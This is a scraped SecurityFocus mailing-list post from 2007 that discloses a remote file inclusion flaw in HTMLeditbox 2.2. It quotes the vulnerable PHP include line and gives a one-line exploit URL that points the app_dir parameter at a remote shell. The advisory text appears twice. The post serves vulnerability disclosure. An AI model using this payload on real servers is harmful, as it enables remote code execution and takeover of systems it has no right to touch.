Back to list
|
Post reply
HTMLeditbox & 2.2 >> RFI
Apr 25 2007 10:52AM
alijsb yahoo com
+++++++
name & version :HTMLeditbox & 2.2
vendor: http://www.labs4.com
by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,dNetGuru
bug :
_editor.php @include($settings[app_dir].'/inc/config.php');
exploit :
http://victim/_editor.php?settings[app_dir]=http://shell
++++++
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
name & version :HTMLeditbox & 2.2
vendor: http://www.labs4.com
by : www.hackerz.ir userz,s3rv3r_hack3r,saeid_only_linux,dNetGuru
bug :
_editor.php @include($settings[app_dir].'/inc/config.php');
exploit :
http://victim/_editor.php?settings[app_dir]=http://shell
++++++
[ reply ]